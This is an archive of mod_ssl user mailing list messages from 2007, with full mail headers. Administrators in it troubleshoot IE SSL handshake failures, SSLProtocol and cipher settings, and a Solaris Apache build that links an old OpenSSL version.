User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 31 17:29:11 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2A92114D878; Thu, 31 May 2007 17:29:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.sep.com (IP-216-37-52-133.nframe.net [216.37.52.133])
	by master.modssl.org (Postfix) with ESMTP id BA02514D836
	for ; Thu, 31 May 2007 17:29:09 +0200 (CEST)
Received: from olorin.net.sep.com (olorin.sep.com [172.16.0.114])
	by mail.sep.com (Postfix) with ESMTP id A78973DE9
	for ; Thu, 31 May 2007 11:28:19 -0400 (EDT)
Date: Thu, 31 May 2007 11:28:18 -0400 (Eastern Daylight Time)
From: "David P. Mott" 
To: mod_ssl List 
Subject: Re: Random SSL Problems
In-Reply-To: <465ED579.6010707@kegworks.com>
Message-ID: 
References: <465ED579.6010707@kegworks.com>
X-X-Sender: dpmott@gothmog.sep.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David P. Mott" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Here are some shots in the dark for you:

When I tried to tighten down the ciphers and SSL protocols on my server, 
some (but not all) users on both IE6 and IE7 started to get that "page not 
found" error (although my log error was something like "re-negotiate 
failed").  I found that IE7 will fail to renegotiate with an SSLv3-only 
server if IE7 is configured to use both TLSv1 and SSLv3 (I guess it tries 
really hard to use TLSv1).  I plan to support SSLv3 and TLSv1 to address 
this problem.

Specifically:
   Didn't work:
         SSLProtocol -all +SSLv3
             or
         SSLProtocol SSLv3
   Did work:
         SSLProtocol all -SSLv2
             or
         SSLProtocol -all +SSLv3 +TLSv1

(I prefer the last incantation, which protects against the unexpected 
change in definition of 'all' after an Apache upgrade)

I also had this, to tighten up the ciphers:
         SSLCipherSuite           HIGH:MEDIUM


Also, if your stock config files don't already do it, you may want to 
implement the "fixes" for broken versions of IE (prior to IE6, I believe):
         SetEnvIf User-Agent ".*MSIE.*" \
                  nokeepalive ssl-unclean-shutdown \
                  downgrade-1.0 force-response-1.0

although the first line is different for newer versions of Apache:
         BrowserMatch ".*MSIE.*" \
                  nokeepalive ssl-unclean-shutdown \
                  downgrade-1.0 force-response-1.0



On Thu, 31 May 2007, John Nichel wrote:

> Hi List,
>
>  I having an issue here on a newly setup webserver that I'm hoping you
> can help me with.  For some reason, when some of our customers click to
> go into the secure area of our site, they're getting the Plain Jane IE
> error page of "Page cannot be displayed".  When this happens, I get an
> error like this in the error log:
>
>> [Thu May 31 09:29:10 2007] [error] mod_ssl: SSL handshake interrupted by 
>> system [Hint: Stop button pressed in browser?!] (System error follows)
>> [Thu May 31 09:29:10 2007] [error] System: Connection reset by peer (errno: 
>> 104)
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 31 17:37:13 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2DE1514D878; Thu, 31 May 2007 17:37:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from www.kegworks.com (web.dotcomholdingsofbuffalo.com [69.20.124.142])
	by master.modssl.org (Postfix) with SMTP id 17CC714D836
	for ; Thu, 31 May 2007 17:37:11 +0200 (CEST)
Received: (qmail 5275 invoked by uid 541); 31 May 2007 15:36:22 -0000
Received: from 63.131.28.2 by web.dotcomholdingsofbuffalo.com (envelope-from , uid 507) with qmail-scanner-1.25st 
 (clamdscan: 0.85.1/3333. spamassassin: 2.64. perlscan: 1.25st.  
 Clear:RC:1(63.131.28.2):. 
 Processed in 0.033862 secs); 31 May 2007 15:36:22 -0000
Received: from static-63-131-28-2.buf.onecommunications.net (HELO ?192.168.1.6?) (63.131.28.2)
  by www.kegworks.com with SMTP; 31 May 2007 15:36:22 -0000
Message-ID: <465EEB76.10200@kegworks.com>
Date: Thu, 31 May 2007 11:36:22 -0400
From: John Nichel 
User-Agent: Thunderbird 2.0.0.0 (X11/20070326)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Random SSL Problems
References: <465ED579.6010707@kegworks.com> 
In-Reply-To: 
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Nichel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

David P. Mott wrote:
> 
> Here are some shots in the dark for you:
> 
> When I tried to tighten down the ciphers and SSL protocols on my server, 
> some (but not all) users on both IE6 and IE7 started to get that "page 
> not found" error (although my log error was something like "re-negotiate 
> failed").  I found that IE7 will fail to renegotiate with an SSLv3-only 
> server if IE7 is configured to use both TLSv1 and SSLv3 (I guess it 
> tries really hard to use TLSv1).  I plan to support SSLv3 and TLSv1 to 
> address this problem.
> 
> Specifically:
>   Didn't work:
>         SSLProtocol -all +SSLv3
>             or
>         SSLProtocol SSLv3
>   Did work:
>         SSLProtocol all -SSLv2
>             or
>         SSLProtocol -all +SSLv3 +TLSv1
> 
> (I prefer the last incantation, which protects against the unexpected 
> change in definition of 'all' after an Apache upgrade)
> 
> I also had this, to tighten up the ciphers:
>         SSLCipherSuite           HIGH:MEDIUM
> 
> 
> Also, if your stock config files don't already do it, you may want to 
> implement the "fixes" for broken versions of IE (prior to IE6, I believe):
>         SetEnvIf User-Agent ".*MSIE.*" \
>                  nokeepalive ssl-unclean-shutdown \
>                  downgrade-1.0 force-response-1.0
> 
> although the first line is different for newer versions of Apache:
>         BrowserMatch ".*MSIE.*" \
>                  nokeepalive ssl-unclean-shutdown \
>                  downgrade-1.0 force-response-1.0
> 

Thank you.  I'll give this a shot.  By newer versions of Apache, do you 
mean in the 1.3.x build?

-- 
John C. Nichel IV
System Administrator
KegWorks
http://www.kegworks.com
716.362.9212 x16
john@kegworks.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 31 17:40:54 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8E48C14D878; Thu, 31 May 2007 17:40:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.sep.com (IP-216-37-52-133.nframe.net [216.37.52.133])
	by master.modssl.org (Postfix) with ESMTP id EE00F14D836
	for ; Thu, 31 May 2007 17:40:53 +0200 (CEST)
Received: from olorin.net.sep.com (olorin.sep.com [172.16.0.114])
	by mail.sep.com (Postfix) with ESMTP id A6B803DE9
	for ; Thu, 31 May 2007 11:40:04 -0400 (EDT)
Date: Thu, 31 May 2007 11:40:04 -0400 (Eastern Daylight Time)
From: "David P. Mott" 
To: modssl-users@modssl.org
Subject: Re: Random SSL Problems
In-Reply-To: <465EEB76.10200@kegworks.com>
Message-ID: 
References: <465ED579.6010707@kegworks.com> 
 <465EEB76.10200@kegworks.com>
X-X-Sender: dpmott@gothmog.sep.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David P. Mott" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



On Thu, 31 May 2007, John Nichel wrote:

> Thank you.  I'll give this a shot.  By newer versions of Apache, do you 
> mean in the 1.3.x build?

Yup.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  4 17:53:29 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DCC3D14D887; Mon,  4 Jun 2007 17:53:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ftmta02.osb.ft.com (ftmta02.ft.com [145.246.241.48])
	by master.modssl.org (Postfix) with ESMTP id 3ACFA14D836
	for ; Mon,  4 Jun 2007 17:53:28 +0200 (CEST)
Subject: OpenSSL verion from mod_ssl statically compiled into httpd?
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.11   July 24, 2002
Message-ID: 
From: Vishal.Bhalla@FT.com
Date: Mon, 4 Jun 2007 16:52:34 +0100
X-MIMETrack: Serialize by Router on FTMTA02/FTINTERNETMAIL(Release 6.5|September 26, 2003) at
 04/06/2007 16:51:21
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vishal.Bhalla@FT.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





Question: How do I find out the version of openssl used by my httpd that
has mod_ssl statically compiled into it?

"HEAD / HTTP/1.0" shows no mod_ssl info, and the only way in which I can
get anything is to use the following in the Apache conf:

CustomLog /tmp/ssl.log "%{SSL_VERSION_LIBRARY}x %{SSL_VERSION_INTERFACE}x"

Is this accurate, and can it be trusted? I ask because I recompiled
apache/mod_ssl using openssl 0.9.8c and the version the above showed in the
logs was older: 0.9.7b, which isn't installed on the box...?

My LD_LIBRARY path was set to /usr/local/ssl/lib, which contained:

engines/
libcrypto.a
libcrypto.so
libcrypto.so.0.9.8*
libssl.a
libssl.so
libssl.so.0.9.8*
pkgconfig/

It's an old setup that I've inherited from people who have all left now :-(
The source files and the way in which this was compiled have gone.

To be honest, I'm a bit confused as to the whole ssl setup with regards to
solaris <-->apache <--> mod_ssl. I download and compiled openssl 0.9.8e
from source and compiled mod_ssl with ./configure
--with-apache=../apache_1.3.37 --with-ssl=../openssl-0.9.8e

But when apache built, it said that it was using 0.9.8c the one installed
as a pkg on the solaris box. Why would it do that? Anyway, the custom log
shows
the correct mod_ssl version, but an old openssl version.

Any help is much appreciated, thanks in advance guys.

Regards,
Vish.
**********************************************************************************
This email may contain confidential material.  If you were not an intended
recipient, please notify the sender and delete all copies.  We may monitor
email to and from our network. For more details see www.FT.com.

The Financial Times Limited, registered in England and Wales number 227590.
Registered office: Number One Southwark Bridge, London SE1 9HL.  VAT number
GB 278 5371 21.

F.T. Publications Inc, incorporated in New York, number 13-2545828,
Registered office: 1330 Avenue of the Americas, New York NY 10019, USA.

The Financial Times (HK) Limited, registered in Hong Kong number 108204,
Registered office: Suite 2903-2909, level 29, 2 International Finance
Centre, No.8 Finance Street, Central, Hong Kong.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  6 07:11:02 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8AE2714D86E; Wed,  6 Jun 2007 07:11:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51008.mail.re2.yahoo.com (web51008.mail.re2.yahoo.com [206.190.38.139])
	by master.modssl.org (Postfix) with SMTP id 434F514D84D
	for ; Wed,  6 Jun 2007 07:11:00 +0200 (CEST)
Received: (qmail 65856 invoked by uid 60001); 6 Jun 2007 05:10:09 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Message-ID;
  b=0W9UipUA89Rm7s353yifvjOTOG3CNeHTWtjR/vuGu/5ESgUjiYgD7njOrduNTP36zI/GOKm8lQAjJa1fh8ndmIB7vXGJQGhytxngOHh1ZA4aMijN1+Vg51HtBPr7jCgQ9CvYwE5T/GWren6qwvf9LsWyEcIJh3TunV4K8lP/VeU=;
X-YMail-OSG: 6cKtlYcVM1m0uqTWid87y6ijcCJ5wYzB3iWjCoTyUdNQuhihCcjojCIWRznT0vljzQ--
Received: from [63.207.162.33] by web51008.mail.re2.yahoo.com via HTTP; Tue, 05 Jun 2007 22:10:09 PDT
X-Mailer: YahooMailRC/651.29 YahooMailWebService/0.7.41.16
Date: Tue, 5 Jun 2007 22:10:08 -0700 (PDT)
From: Zareh 
Subject: Re: OpenSSL verion from mod_ssl statically compiled into httpd?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=ascii
Message-ID: <158079.65301.qm@web51008.mail.re2.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zareh 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Vishal,

I seem to remember running into this a while back, it turned out that I had old ssl libs in /usr/local/ssl and apache's build scripts were picking them up. instead of /usr/local/openssl - I can't remember what I did to get them to compile with the newer openssl libs, but here are a few things you could try:

1) Set the following in your environment before you build apache/mod_ssl

SSL_BASE=/usr/local/openssl  (wherever the libs are you want to compile against)
export SSL_BASE

2) Find the libs ( find /usr/* -type f -name '*ssl*' ), tar them up and move them into another directory. Build apache/mod_ssl - then just untar the old libs back into place.
... kinda messy though :)

----- Original Message ----
From: "Vishal.Bhalla@FT.com" 
To: modssl-users@modssl.org
Sent: Monday, June 4, 2007 8:52:34 AM
Subject: OpenSSL verion from mod_ssl statically compiled into httpd?





Question: How do I find out the version of openssl used by my httpd that
has mod_ssl statically compiled into it?

"HEAD / HTTP/1.0" shows no mod_ssl info, and the only way in which I can
get anything is to use the following in the Apache conf:

CustomLog /tmp/ssl.log "%{SSL_VERSION_LIBRARY}x %{SSL_VERSION_INTERFACE}x"

Is this accurate, and can it be trusted? I ask because I recompiled
apache/mod_ssl using openssl 0.9.8c and the version the above showed in the
logs was older: 0.9.7b, which isn't installed on the box...?

My LD_LIBRARY path was set to /usr/local/ssl/lib, which contained:

engines/
libcrypto.a
libcrypto.so
libcrypto.so.0.9.8*
libssl.a
libssl.so
libssl.so.0.9.8*
pkgconfig/

It's an old setup that I've inherited from people who have all left now :-(
The source files and the way in which this was compiled have gone.

To be honest, I'm a bit confused as to the whole ssl setup with regards to
solaris <-->apache <--> mod_ssl. I download and compiled openssl 0.9.8e
from source and compiled mod_ssl with ./configure
--with-apache=../apache_1.3.37 --with-ssl=../openssl-0.9.8e

But when apache built, it said that it was using 0.9.8c the one installed
as a pkg on the solaris box. Why would it do that? Anyway, the custom log
shows
the correct mod_ssl version, but an old openssl version.

Any help is much appreciated, thanks in advance guys.

Regards,
Vish.
**********************************************************************************
This email may contain confidential material.  If you were not an intended
recipient, please notify the sender and delete all copies.  We may monitor
email to and from our network. For more details see www.FT.com.

The Financial Times Limited, registered in England and Wales number 227590.
Registered office: Number One Southwark Bridge, London SE1 9HL.  VAT number
GB 278 5371 21.

F.T. Publications Inc, incorporated in New York, number 13-2545828,
Registered office: 1330 Avenue of the Americas, New York NY 10019, USA.

The Financial Times (HK) Limited, registered in Hong Kong number 108204,
Registered office: Suite 2903-2909, level 29, 2 International Finance
Centre, No.8 Finance Street, Central, Hong Kong.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org





       
____________________________________________________________________________________
Moody friends. Drama queens. Your life? Nope! - their life, your story. Play Sims Stories at Yahoo! Games.
http://sims.yahoo.com/  
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  7 08:09:06 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id ADD9514D868; Thu,  7 Jun 2007 08:09:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.dnsmadeeasy.com (smtp1.dnsmadeeasy.com [205.234.170.134])
	by master.modssl.org (Postfix) with ESMTP id 30F6814D82E
	for ; Thu,  7 Jun 2007 08:09:06 +0200 (CEST)
Received: from smtp1.dnsmadeeasy.com (localhost [127.0.0.1])
	by smtp1.dnsmadeeasy.com (Postfix) with ESMTP id AF48C2BCBF9
	for ; Thu,  7 Jun 2007 06:08:14 +0000 (GMT)
X-Authenticated-Name: beileysoftware
X-Transit-System: In case of SPAM please contact abuse@dnsmadeeasy.com
Received: from MarkE1505 (mail.handyaddressbook.com [209.181.98.231])
	by smtp1.dnsmadeeasy.com (Postfix) with ESMTP
	for ; Thu,  7 Jun 2007 06:08:14 +0000 (GMT)
Message-ID: 
From: "Mark Beiley" 
To: 
Subject: Apache 2.0 + mod_ssl problems with IE6 on XP (no SP2)
Date: Wed, 6 Jun 2007 23:08:13 -0700
Organization: Beiley Software
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Windows Mail 6.0.6000.16386
X-MimeOLE: Produced By Microsoft MimeOLE V6.0.6000.16386
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mark Beiley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

Several customers are not able to access my server via HTTPS.  Their browser
just sits there, and doesn't display anything.  I've determined the common
properties of these cases to be:

Windows XP (all of them without SP2)
Internet Explorer 6

I can see their requests show up fine in my log files, without errors.
These customers can visit other HTTPS sites.  My site works fine for the
vast majority of people.  I'm stumped on the next step to try and debug
the problem.  Any suggestions?

My server configuration:
Apache 2.0.54 with mod_ssl and mod_deflate, running on Windows XP

For an example URL, try: https://www.beileysoftware.com/handy.html

Thanks,
Mark
http://www.beiley.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  7 15:00:17 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9ADC414D88A; Thu,  7 Jun 2007 15:00:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ftmta02.osb.ft.com (ftmta02.ft.com [145.246.241.48])
	by master.modssl.org (Postfix) with ESMTP id 83BAF14D82E;
	Thu,  7 Jun 2007 15:00:16 +0200 (CEST)
Subject: Re: OpenSSL verion from mod_ssl statically compiled into httpd?
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org,
	owner-modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.11   July 24, 2002
Message-ID: 
From: Vishal.Bhalla@FT.com
Date: Thu, 7 Jun 2007 13:59:01 +0100
X-MIMETrack: Serialize by Router on FTMTA02/FTINTERNETMAIL(Release 6.5|September 26, 2003) at
 07/06/2007 13:58:07
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vishal.Bhalla@FT.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





Thanks for the reply Zareh, but still no joy :-(

We DO have old libraries on the box, but when compiling apache (after
setting SSL_BASE),
The output does show:
.
.
      + SSL library version: OpenSSL 0.9.8e 23 Feb 2007
.
.
Running a strings on httpd shows:

OpenSSL 0.9.7b 10 Apr 2003
SSLv2 part of OpenSSL 0.9.8e 23 Feb 2007
TLSv1 part of OpenSSL 0.9.8e 23 Feb 2007
OpenSSL 0.9.8e 23 Feb 2007
SSLv3 part of OpenSSL 0.9.8e 23 Feb 2007
Big Number part of OpenSSL 0.9.8e 23 Feb 2007
RSA part of OpenSSL 0.9.8e 23 Feb 2007
Diffie-Hellman part of OpenSSL 0.9.8e 23 Feb 2007
Stack part of OpenSSL 0.9.8e 23 Feb 2007
lhash part of OpenSSL 0.9.8e 23 Feb 2007
EVP part of OpenSSL 0.9.8e 23 Feb 2007
ASN.1 part of OpenSSL 0.9.8e 23 Feb 2007
X.509 part of OpenSSL 0.9.8e 23 Feb 2007
MD2 part of OpenSSL 0.9.8e 23 Feb 2007
MD5 part of OpenSSL 0.9.8e 23 Feb 2007
SHA1 part of OpenSSL 0.9.8e 23 Feb 2007
SHA-256 part of OpenSSL 0.9.8e 23 Feb 2007
SHA-512 part of OpenSSL 0.9.8e 23 Feb 2007
DES part of OpenSSL 0.9.8e 23 Feb 2007
libdes part of OpenSSL 0.9.8e 23 Feb 2007
RC2 part of OpenSSL 0.9.8e 23 Feb 2007
RC4 part of OpenSSL 0.9.8e 23 Feb 2007
IDEA part of OpenSSL 0.9.8e 23 Feb 2007
DSA part of OpenSSL 0.9.8e 23 Feb 2007
ECDSA part of OpenSSL 0.9.8e 23 Feb 2007
ECDH part of OpenSSL 0.9.8e 23 Feb 2007
RAND part of OpenSSL 0.9.8e 23 Feb 2007
PEM part of OpenSSL 0.9.8e 23 Feb 2007
CONF part of OpenSSL 0.9.8e 23 Feb 2007
CONF_def part of OpenSSL 0.9.8e 23 Feb 2007

As you can see from the top line, 0.9.7b is comming in from somewhere!?#@!

Question, is the output of this LogFormat line an accurate reflection of
what version of openssl was compiled into httpd?:

   CustomLog /tmp/ssl.log "%{SSL_VERSION_LIBRARY}x
%{SSL_VERSION_INTERFACE}x"

I'll try and move those libs out of the way, and re-compile



|---------+----------------------------->
|         |           Zareh             |
|         |                            |
|         |           Sent by:          |
|         |           owner-modssl-users|
|         |           @modssl.org       |
|         |                             |
|         |                             |
|         |           06/06/2007 06:10  |
|         |           Please respond to |
|         |           modssl-users      |
|         |                             |
|---------+----------------------------->
  >------------------------------------------------------------------------------------------------------------------------------|
  |<                                                                                                                             |
  |       To:       modssl-users@modssl.org<                                                                                     |
  |       cc:                                                                                                                    |
  |       Subject:  Re: OpenSSL verion from mod_ssl statically compiled into httpd?                                              |
  >------------------------------------------------------------------------------------------------------------------------------|




Hi Vishal,

I seem to remember running into this a while back, it turned out that I had
old ssl libs in /usr/local/ssl and apache's build scripts were picking them
up. instead of /usr/local/openssl - I can't remember what I did to get them
to compile with the newer openssl libs, but here are a few things you could
try:

1) Set the following in your environment before you build apache/mod_ssl

SSL_BASE=/usr/local/openssl  (wherever the libs are you want to compile
against)
export SSL_BASE

2) Find the libs ( find /usr/* -type f -name '*ssl*' ), tar them up and
move them into another directory. Build apache/mod_ssl - then just untar
the old libs back into place.
... kinda messy though :)

----- Original Message ----
From: "Vishal.Bhalla@FT.com" 
To: modssl-users@modssl.org
Sent: Monday, June 4, 2007 8:52:34 AM
Subject: OpenSSL verion from mod_ssl statically compiled into httpd?





Question: How do I find out the version of openssl used by my httpd that
has mod_ssl statically compiled into it?

"HEAD / HTTP/1.0" shows no mod_ssl info, and the only way in which I can
get anything is to use the following in the Apache conf:

CustomLog /tmp/ssl.log "%{SSL_VERSION_LIBRARY}x %{SSL_VERSION_INTERFACE}x"

Is this accurate, and can it be trusted? I ask because I recompiled
apache/mod_ssl using openssl 0.9.8c and the version the above showed in the
logs was older: 0.9.7b, which isn't installed on the box...?

My LD_LIBRARY path was set to /usr/local/ssl/lib, which contained:

engines/
libcrypto.a
libcrypto.so
libcrypto.so.0.9.8*
libssl.a
libssl.so
libssl.so.0.9.8*
pkgconfig/

It's an old setup that I've inherited from people who have all left now :-(
The source files and the way in which this was compiled have gone.

To be honest, I'm a bit confused as to the whole ssl setup with regards to
solaris <-->apache <--> mod_ssl. I download and compiled openssl 0.9.8e
from source and compiled mod_ssl with ./configure
--with-apache=../apache_1.3.37 --with-ssl=../openssl-0.9.8e

But when apache built, it said that it was using 0.9.8c the one installed
as a pkg on the solaris box. Why would it do that? Anyway, the custom log
shows
the correct mod_ssl version, but an old openssl version.

Any help is much appreciated, thanks in advance guys.

Regards,
Vish.
**********************************************************************************

This email may contain confidential material.  If you were not an intended
recipient, please notify the sender and delete all copies.  We may monitor
email to and from our network. For more details see www.FT.com.

The Financial Times Limited, registered in England and Wales number 227590.
Registered office: Number One Southwark Bridge, London SE1 9HL.  VAT number
GB 278 5371 21.

F.T. Publications Inc, incorporated in New York, number 13-2545828,
Registered office: 1330 Avenue of the Americas, New York NY 10019, USA.

The Financial Times (HK) Limited, registered in Hong Kong number 108204,
Registered office: Suite 2903-2909, level 29, 2 International Finance
Centre, No.8 Finance Street, Central, Hong Kong.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org






____________________________________________________________________________________

Moody friends. Drama queens. Your life? Nope! - their life, your story.
Play Sims Stories at Yahoo! Games.
http://sims.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org




**********************************************************************************
This email may contain confidential material. If you were not an
intended recipient, please notify the sender and delete all copies.
We may monitor email to and from our network.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  7 15:07:18 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1667014D888; Thu,  7 Jun 2007 15:07:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.aeccom.com (port-83-236-156-30.static.qsc.de [83.236.156.30])
	by master.modssl.org (Postfix) with ESMTP id D917B14D82E
	for ; Thu,  7 Jun 2007 15:07:16 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail.aeccom.com (Postfix) with ESMTP id B6C191D00A
	for ; Thu,  7 Jun 2007 15:06:25 +0200 (CEST)
Received: from mail.aeccom.com ([127.0.0.1])
 by localhost (gate6.aeccom.com [127.0.0.1]) (amavisd-new, port 10024)
 with LMTP id 08330-01-2 for ;
 Thu,  7 Jun 2007 15:06:24 +0200 (CEST)
Received: from [192.168.2.140] (andes.core.aeccom.com [192.168.2.140])
	by mail.aeccom.com (Postfix) with ESMTP id B24D91CD93
	for ; Thu,  7 Jun 2007 15:06:24 +0200 (CEST)
Message-ID: <466802CF.2020407@aeccom.com>
Date: Thu, 07 Jun 2007 15:06:23 +0200
From: Sven Geisler 
Organization: AEC/communications GmbH
User-Agent: Thunderbird 2.0.0.0 (Windows/20070326)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Apache 2.0 + mod_ssl problems with IE6 on XP (no SP2)
References: 
In-Reply-To: 
X-Enigmail-Version: 0.95.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at aeccom.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sven Geisler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Mark,

Do you have KeepALive on in you server config for this browser?

Sven.


Mark Beiley schrieb:
> Hello,
> 
> Several customers are not able to access my server via HTTPS.  Their
> browser
> just sits there, and doesn't display anything.  I've determined the common
> properties of these cases to be:
> 
> Windows XP (all of them without SP2)
> Internet Explorer 6
> 
> I can see their requests show up fine in my log files, without errors.
> These customers can visit other HTTPS sites.  My site works fine for the
> vast majority of people.  I'm stumped on the next step to try and debug
> the problem.  Any suggestions?
> 
> My server configuration:
> Apache 2.0.54 with mod_ssl and mod_deflate, running on Windows XP
> 
> For an example URL, try: https://www.beileysoftware.com/handy.html
> 
> Thanks,
> Mark
> http://www.beiley.com
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Sven Geisler    Tel +49.30.921017.81  Fax .50
Senior Developer, AEC/communications GmbH & Co. KG Berlin, Germany
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  7 23:36:21 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C382514D87F; Thu,  7 Jun 2007 23:36:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.dnsmadeeasy.com (smtp1.dnsmadeeasy.com [205.234.170.134])
	by master.modssl.org (Postfix) with ESMTP id 8680D14D82E
	for ; Thu,  7 Jun 2007 23:36:19 +0200 (CEST)
Received: from smtp1.dnsmadeeasy.com (localhost [127.0.0.1])
